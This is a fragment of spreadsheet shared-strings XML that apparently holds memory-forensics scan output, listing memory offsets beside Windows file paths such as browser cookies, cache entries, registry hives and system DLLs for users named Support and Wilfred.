    <t>54C0D5_CB45DD</t>
  </si>
  <si>
    <t>E8E7B157F1C</t>
  </si>
  <si>
    <t>FD0BBC</t>
  </si>
  <si>
    <t>D530A964E_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd1c6e0</t>
  </si>
  <si>
    <t>0xdfd1d250</t>
  </si>
  <si>
    <t>0xdfd1d498</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\1TC1F8AE.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd1e1a8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\P7S1ZIRL.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd1e460</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DXJFQ9GW\p</t>
  </si>
  <si>
    <t>x[1].gif_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd1eb98</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5498EF90B621354BB7F904ABC8</t>
  </si>
  <si>
    <t>30A9A8_D73984</t>
  </si>
  <si>
    <t>70ECFF5ABBC</t>
  </si>
  <si>
    <t>8A8FC0</t>
  </si>
  <si>
    <t>83DC1D6AB_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd1f1a0</t>
  </si>
  <si>
    <t>527E5F_26216B</t>
  </si>
  <si>
    <t>03A7D1C9F1F</t>
  </si>
  <si>
    <t>B089B9</t>
  </si>
  <si>
    <t>4753F41C1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd1f628</t>
  </si>
  <si>
    <t>0xdfd1f6e0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3ERB3PXY\K</t>
  </si>
  <si>
    <t>MmSU5fABc-[</t>
  </si>
  <si>
    <t>0xdfd201a0</t>
  </si>
  <si>
    <t>527E5F_6E16BB</t>
  </si>
  <si>
    <t>2D768432720</t>
  </si>
  <si>
    <t>24D327</t>
  </si>
  <si>
    <t>A60EFA6A4_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd207e0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\50D6B15D9F2DCE1EDBB0C09862</t>
  </si>
  <si>
    <t>5FBE47_281AC8</t>
  </si>
  <si>
    <t>07DE0FEF15F</t>
  </si>
  <si>
    <t>2CA991</t>
  </si>
  <si>
    <t>1FE760A9B_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd20960</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\WZ4CAHE8.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd20a70</t>
  </si>
  <si>
    <t>lity\Narrator</t>
  </si>
  <si>
    <t>0xdfd20b28</t>
  </si>
  <si>
    <t>lity\Magnify.</t>
  </si>
  <si>
    <t>0xdfd20be0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5544C19C3781C84C09B5CDD166</t>
  </si>
  <si>
    <t>FB0154_CC3067</t>
  </si>
  <si>
    <t>B6CD1CE0FD6</t>
  </si>
  <si>
    <t>AC010B</t>
  </si>
  <si>
    <t>899D3E232_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd20f80</t>
  </si>
  <si>
    <t>0xdfd218c0</t>
  </si>
  <si>
    <t>[2].txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd21aa8</t>
  </si>
  <si>
    <t>0xdfd21e00</t>
  </si>
  <si>
    <t>B5CCD5_B06229</t>
  </si>
  <si>
    <t>F2DF6BCFA2B</t>
  </si>
  <si>
    <t>09230E</t>
  </si>
  <si>
    <t>A38029998_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd21f80</t>
  </si>
  <si>
    <t>MmEU9fABc-[</t>
  </si>
  <si>
    <t>0xdfd221d8</t>
  </si>
  <si>
    <t>0xdfd22290</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\64DCC9872C5635B1B7891B3066</t>
  </si>
  <si>
    <t>5E0558_5552C2</t>
  </si>
  <si>
    <t>0A263135782</t>
  </si>
  <si>
    <t>0903FD</t>
  </si>
  <si>
    <t>38A8C0F9F_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd22510</t>
  </si>
  <si>
    <t>F3328_6CBA2C0</t>
  </si>
  <si>
    <t>6D5985DD95A</t>
  </si>
  <si>
    <t>E59AF8</t>
  </si>
  <si>
    <t>FC7C6220_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd23038</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\17ETLEBY.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd232b8</t>
  </si>
  <si>
    <t>sd_listener[1</t>
  </si>
  <si>
    <t>].js_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd23570</t>
  </si>
  <si>
    <t>B5CCD5_6169BC</t>
  </si>
  <si>
    <t>9CF871A2671</t>
  </si>
  <si>
    <t>FE515E</t>
  </si>
  <si>
    <t>B7B0EA7BA_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd23e58</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v2.0.50727\diasymreader.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd23f80</t>
  </si>
  <si>
    <t>0xdfd24038</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Temp\BGInfo.bmp_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd241f0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\AF3BA1CDD96BBC740C9CE3754F</t>
  </si>
  <si>
    <t>0xdfd253f8</t>
  </si>
  <si>
    <t>0xdfd254b0</t>
  </si>
  <si>
    <t>527E5F_D89D0C</t>
  </si>
  <si>
    <t>703915A43EA</t>
  </si>
  <si>
    <t>68AF92</t>
  </si>
  <si>
    <t>8973D5557_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd25b40</t>
  </si>
  <si>
    <t>iAB0002.002_x001B_[</t>
  </si>
  <si>
    <t>0xdfd25e18</t>
  </si>
  <si>
    <t>527E5F_42A7D4</t>
  </si>
  <si>
    <t>F849DF049CB</t>
  </si>
  <si>
    <t>638B0C</t>
  </si>
  <si>
    <t>A30509FC8_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd274d0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8BE8661331D28D524AEAFB70BA</t>
  </si>
  <si>
    <t>888255_AF8BC1</t>
  </si>
  <si>
    <t>E0A8D32DDCF</t>
  </si>
  <si>
    <t>F679006F1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd27650</t>
  </si>
  <si>
    <t>Mu5mxM[1].w</t>
  </si>
  <si>
    <t>0xdfd284c8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\99E7D179A416539E7B659C228E</t>
  </si>
  <si>
    <t>8F1AA4_BDF1F5</t>
  </si>
  <si>
    <t>C6874A3F6C9</t>
  </si>
  <si>
    <t>7255F763A_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd28748</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5A9F714972C2F7A280AA3A0201</t>
  </si>
  <si>
    <t>65389E_74FB9C</t>
  </si>
  <si>
    <t>1A40C404934</t>
  </si>
  <si>
    <t>34BD8C</t>
  </si>
  <si>
    <t>A1BF11A7D_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd28980</t>
  </si>
  <si>
    <t>0xdfd28c38</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\ZSUVCHBN.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd28db8</t>
  </si>
  <si>
    <t>ont-awesome.m</t>
  </si>
  <si>
    <t>in[1].css_x001B_[</t>
  </si>
  <si>
    <t>0xdfd29348</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\41E729636896BD186E9FDA5587</t>
  </si>
  <si>
    <t>05F775_x001B_[0K</t>
  </si>
  <si>
    <t>_x001B_[0K_x001B_[117G</t>
  </si>
  <si>
    <t>0xdfd29f80</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\KK4WQHKL.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd2a358</t>
  </si>
  <si>
    <t>8CF53F_DAD28E</t>
  </si>
  <si>
    <t>C3F82C35FCD</t>
  </si>
  <si>
    <t>336C7A</t>
  </si>
  <si>
    <t>5E8A1764E_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd2bc18</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Sqm\iesqmdata2.sqm_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd2c038</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\ShapeCollector.lnk_x001B_[0</t>
  </si>
  <si>
    <t>0xdfd2c318</t>
  </si>
  <si>
    <t>0xdfd2d180</t>
  </si>
  <si>
    <t>AckE3I[1].png</t>
  </si>
  <si>
    <t>0xdfd2d238</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5C588F63F631DF1D66D480A541</t>
  </si>
  <si>
    <t>541A3D_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd2d370</t>
  </si>
  <si>
    <t>0xdfd2d570</t>
  </si>
  <si>
    <t>0xdfd2d9f8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DXJFQ9GW\o</t>
  </si>
  <si>
    <t>penid[1].css_x001B_</t>
  </si>
  <si>
    <t>0xdfd2de78</t>
  </si>
  <si>
    <t>0xdfd2df30</t>
  </si>
  <si>
    <t>0xdfd2e1a0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explor</t>
  </si>
  <si>
    <t>0xdfd2e698</t>
  </si>
  <si>
    <t>nnamed[10].jp</t>
  </si>
  <si>
    <t>0xdfd30038</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EB2C4AB8B68FFA4B7733A913923</t>
  </si>
  <si>
    <t>9A396_D76DB90</t>
  </si>
  <si>
    <t>1EE986B889F</t>
  </si>
  <si>
    <t>30D8CC</t>
  </si>
  <si>
    <t>06229E2D_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd30238</t>
  </si>
  <si>
    <t>85AA5B_ACE03B</t>
  </si>
  <si>
    <t>B44A62FE3F5</t>
  </si>
  <si>
    <t>2B2D45</t>
  </si>
  <si>
    <t>D870897AD_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd31038</t>
  </si>
  <si>
    <t>D8DF7B_381AEB</t>
  </si>
  <si>
    <t>6BAC8E13E08</t>
  </si>
  <si>
    <t>A86823</t>
  </si>
  <si>
    <t>17B3A13C7_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd31280</t>
  </si>
  <si>
    <t>5AA5B_9C2FED4</t>
  </si>
  <si>
    <t>5DE7A4D399C</t>
  </si>
  <si>
    <t>265A22</t>
  </si>
  <si>
    <t>42CFB103_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd320d0</t>
  </si>
  <si>
    <t>\Windows\System32\perfctrs.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd327f8</t>
  </si>
  <si>
    <t>[3].txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd33230</t>
  </si>
  <si>
    <t>\Windows\System32\rasctrs.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd333c0</t>
  </si>
  <si>
    <t>0xdfd33650</t>
  </si>
  <si>
    <t>\Device\HarddiskVolume1\Users\Wilfred\AppData\Local\Microsoft\Windows\UsrClass.dat{355392d9-42</t>
  </si>
  <si>
    <t>d2-11e9-ba55-</t>
  </si>
  <si>
    <t>08002710b8d</t>
  </si>
  <si>
    <t>0}.TM_x001B_</t>
  </si>
  <si>
    <t>0xdfd33768</t>
  </si>
  <si>
    <t>ndroidqr[1].g</t>
  </si>
  <si>
    <t>if_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd33e70</t>
  </si>
  <si>
    <t>0xdfd34dc0</t>
  </si>
  <si>
    <t>0xdfd35038</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Y5MHK58\K</t>
  </si>
  <si>
    <t>0xdfd351c8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C</t>
  </si>
  <si>
    <t>3BDE45_D975BB</t>
  </si>
  <si>
    <t>A8033175C8D</t>
  </si>
  <si>
    <t>D8A7A8AD6_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd35828</t>
  </si>
  <si>
    <t>0xdfd35e68</t>
  </si>
  <si>
    <t>0xdfd36420</t>
  </si>
  <si>
    <t>0xdfd36708</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21A</t>
  </si>
  <si>
    <t>B308D_592839A</t>
  </si>
  <si>
    <t>8569F831D0F</t>
  </si>
  <si>
    <t>2306AE</t>
  </si>
  <si>
    <t>4BB5C24B_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd36d38</t>
  </si>
  <si>
    <t>0xdfd36f80</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3</t>
  </si>
  <si>
    <t>BDE45_D975BBA</t>
  </si>
  <si>
    <t>8033175C8D1</t>
  </si>
  <si>
    <t>12023D</t>
  </si>
  <si>
    <t>8A7A8AD6_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd37038</t>
  </si>
  <si>
    <t>8CF53F_1F208A</t>
  </si>
  <si>
    <t>B6DC9AF621E</t>
  </si>
  <si>
    <t>30DD68</t>
  </si>
  <si>
    <t>24E1B1C5A_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd37778</t>
  </si>
  <si>
    <t>\Windows\System32\UIAnimation.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd381e0</t>
  </si>
  <si>
    <t>888854[1].jpg</t>
  </si>
  <si>
    <t>0xdfd39520</t>
  </si>
  <si>
    <t>\Windows\Media\Windows Critical Stop.wav_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd396d0</t>
  </si>
  <si>
    <t>951457[1].jpg</t>
  </si>
  <si>
    <t>0xdfd39818</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\AF3BA1CDD96BBC740C9CE3754F3</t>
  </si>
  <si>
    <t>48BED_5B6370D</t>
  </si>
  <si>
    <t>F650E34D87F</t>
  </si>
  <si>
    <t>569B14</t>
  </si>
  <si>
    <t>932A144C_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd39db8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\SYPBRZ2N.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd3a0e0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Cookies\MDUXLFTT.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd3a640</t>
  </si>
  <si>
    <t>lient_platfor</t>
  </si>
  <si>
    <t>m[1].js_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd3b2e8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DXJFQ9GW\j</t>
  </si>
  <si>
    <t>query-browser</t>
  </si>
  <si>
    <t>[1].js</t>
  </si>
  <si>
    <t>0xdfd3b4f0</t>
  </si>
  <si>
    <t>2D351_A5A821F</t>
  </si>
  <si>
    <t>40D22C0F849</t>
  </si>
  <si>
    <t>50AF0F</t>
  </si>
  <si>
    <t>EAAD5EC6_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd3b5d8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21</t>
  </si>
  <si>
    <t>0xdfd3b700</t>
  </si>
  <si>
    <t>0xdfd3ce48</t>
  </si>
  <si>
    <t>iAD0001.001_x001B_[</t>
  </si>
  <si>
    <t>0xdfd3d378</t>
  </si>
  <si>
    <t>0xdfd3e330</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0DA515F703BB9B49479E8697AD</t>
  </si>
  <si>
    <t>0xdfd3e4b0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3ERB3PXY\s</t>
  </si>
  <si>
    <t>endspace[1].c</t>
  </si>
  <si>
    <t>ss_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd3e568</t>
  </si>
  <si>
    <t>0xdfd3e620</t>
  </si>
  <si>
    <t>B308D_CCF564B</t>
  </si>
  <si>
    <t>E5A3C924B17</t>
  </si>
  <si>
    <t>DDEBDE</t>
  </si>
  <si>
    <t>B5236E12_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd3e808</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sound Recorder.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd3f3e0</t>
  </si>
  <si>
    <t>\Windows\System32\wcncsvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd44160</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\KFT55LD3.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd44218</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XCHWY7CN\a</t>
  </si>
  <si>
    <t>d_companion[1</t>
  </si>
  <si>
    <t>].htm_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd444f0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E49827401028F7A0F97B5576C77</t>
  </si>
  <si>
    <t>A26CB_7CE95D8</t>
  </si>
  <si>
    <t>DCA26FE957E</t>
  </si>
  <si>
    <t>7BD7D7</t>
  </si>
  <si>
    <t>6F353B08_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd45468</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5</t>
  </si>
  <si>
    <t>CE4A0_5043E0F</t>
  </si>
  <si>
    <t>5DF723415C9</t>
  </si>
  <si>
    <t>EECC20</t>
  </si>
  <si>
    <t>1C838A62_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd45520</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\AIOUYE6W.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd464d8</t>
  </si>
  <si>
    <t>0xdfd48038</t>
  </si>
  <si>
    <t>0xdfd482b8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\M49DUG1W.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd49038</t>
  </si>
  <si>
    <t>query.jstree[</t>
  </si>
  <si>
    <t>0xdfd49208</t>
  </si>
  <si>
    <t>0xdfd4a6d0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3ERB3PXY\u</t>
  </si>
  <si>
    <t>ser[1].gif_x001B_[0</t>
  </si>
  <si>
    <t>0xdfd4a8b8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5C588F63F631DF1D66D480A5415</t>
  </si>
  <si>
    <t>41A3D_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd4ce18</t>
  </si>
  <si>
    <t>527E5F_947EA5</t>
  </si>
  <si>
    <t>F46845000AA</t>
  </si>
  <si>
    <t>5D7115</t>
  </si>
  <si>
    <t>D559502FA_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd4d038</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4344B8AF97AF3A423D9EE52899</t>
  </si>
  <si>
    <t>0xdfd4d1f8</t>
  </si>
  <si>
    <t>0xdfd4d358</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A7E632C3-4300-1</t>
  </si>
  <si>
    <t>1E9-BA56-0800</t>
  </si>
  <si>
    <t>0xdfd4d6f8</t>
  </si>
  <si>
    <t>0xdfd4e1a8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0060A9F9287878B15AB61E0E4</t>
  </si>
  <si>
    <t>7645E5_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd4e7c8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\UI9U56HS.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd4e998</t>
  </si>
  <si>
    <t>2934B_C20E0DA</t>
  </si>
  <si>
    <t>2D0F89FE526</t>
  </si>
  <si>
    <t>E1490F</t>
  </si>
  <si>
    <t>4A2EE5AB_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd51568</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4344B8AF97AF3A423D9EE528999</t>
  </si>
  <si>
    <t>63CDE_D479FEE</t>
  </si>
  <si>
    <t>0A35640E883</t>
  </si>
  <si>
    <t>27A0BDD0_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd517d8</t>
  </si>
  <si>
    <t>\Users\Support\NTUSER.DAT_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd51890</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FC5A820A001B41D68902E051F3</t>
  </si>
  <si>
    <t>6A5282_78FFFB</t>
  </si>
  <si>
    <t>C554554E079</t>
  </si>
  <si>
    <t>56C215</t>
  </si>
  <si>
    <t>6147548B2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd51a10</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5C588F63F631DF1D66D480A541</t>
  </si>
  <si>
    <t>0xdfd51eb8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A99</t>
  </si>
  <si>
    <t>6E4A8_88B6AE0</t>
  </si>
  <si>
    <t>15495C1ECC3</t>
  </si>
  <si>
    <t>95D19C</t>
  </si>
  <si>
    <t>1DD02894_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd52b70</t>
  </si>
  <si>
    <t>0xdfd53380</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\73D5C9E678E726FC270DA23D5C</t>
  </si>
  <si>
    <t>A8C40F_F8C1CE</t>
  </si>
  <si>
    <t>E73D868C1E6</t>
  </si>
  <si>
    <t>A4F707</t>
  </si>
  <si>
    <t>6361DAAAC_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd534c8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3ERB3PXY\D</t>
  </si>
  <si>
    <t>roidSans[1].t</t>
  </si>
  <si>
    <t>tf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd536d8</t>
  </si>
  <si>
    <t>B5CCD5_B47781</t>
  </si>
  <si>
    <t>96FB82994B1</t>
  </si>
  <si>
    <t>632FB4</t>
  </si>
  <si>
    <t>C53DF3D01_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd53790</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5IDSBAN9\A</t>
  </si>
  <si>
    <t>Axt5yO[1].png</t>
  </si>
  <si>
    <t>0xdfd53c68</t>
  </si>
  <si>
    <t>\Windows\System32\utildll.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd53d88</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\EH71MKCC.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd54038</t>
  </si>
  <si>
    <t>0xdfd54188</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\849F2F6E77B19C2C9403799763</t>
  </si>
  <si>
    <t>A10F0C_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd54600</t>
  </si>
  <si>
    <t>2D351_C46D5E6</t>
  </si>
  <si>
    <t>637D30BFEEB</t>
  </si>
  <si>
    <t>7D31D8</t>
  </si>
  <si>
    <t>1AC552A7_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd54b08</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\OOTIWUXY.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd55320</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3ERB3PXY\d</t>
  </si>
  <si>
    <t>ownload[1].js</t>
  </si>
  <si>
    <t>0xdfd556f8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\Z7134WL2.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd557e8</t>
  </si>
  <si>
    <t>0xdfd558e8</t>
  </si>
  <si>
    <t>0xdfd55b98</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5IDSBAN9\a</t>
  </si>
  <si>
    <t>ndroid_app_dl</t>
  </si>
  <si>
    <t>[1].png_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd56038</t>
  </si>
  <si>
    <t>mptracker[1].</t>
  </si>
  <si>
    <t>gif_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd56720</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8D1B12BFF46FB324D465523E18</t>
  </si>
  <si>
    <t>11A3DF_7C7D50</t>
  </si>
  <si>
    <t>56340CBB2B8</t>
  </si>
  <si>
    <t>28DA05</t>
  </si>
  <si>
    <t>B9020C09D_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd568a0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\PJ38WIT0.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd56ee8</t>
  </si>
  <si>
    <t>K_x001B_[150G</t>
  </si>
  <si>
    <t>0xdfd57420</t>
  </si>
  <si>
    <t>0xdfd57698</t>
  </si>
  <si>
    <t>955720[1].jpg</t>
  </si>
  <si>
    <t>0xdfd58130</t>
  </si>
  <si>
    <t>B2D351_C46D5E</t>
  </si>
  <si>
    <t>6637D30BFEE</t>
  </si>
  <si>
    <t>B7D31D</t>
  </si>
  <si>
    <t>81AC552A7_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd583b0</t>
  </si>
  <si>
    <t>954425[1].jpg</t>
  </si>
  <si>
    <t>0xdfd58580</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2</t>
  </si>
  <si>
    <t>798706_93E4B2</t>
  </si>
  <si>
    <t>BA79A897B31</t>
  </si>
  <si>
    <t>00CCB2</t>
  </si>
  <si>
    <t>7F2D3BF4F_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd59180</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A9</t>
  </si>
  <si>
    <t>0xdfd59238</t>
  </si>
  <si>
    <t>0xdfd59788</t>
  </si>
  <si>
    <t>B308D_9487BC0</t>
  </si>
  <si>
    <t>D4381A7CDEB</t>
  </si>
  <si>
    <t>9A8CC4</t>
  </si>
  <si>
    <t>3F66D27C_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfd59a40</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3ERB3PXY\0</t>
  </si>
  <si>
    <t>DA9E381C78761</t>
  </si>
  <si>
    <t>072CD3EE9AC</t>
  </si>
  <si>
    <t>66C608</t>
  </si>
  <si>
    <t>7[1].gif_x001B_[0K</t>
  </si>
  <si>
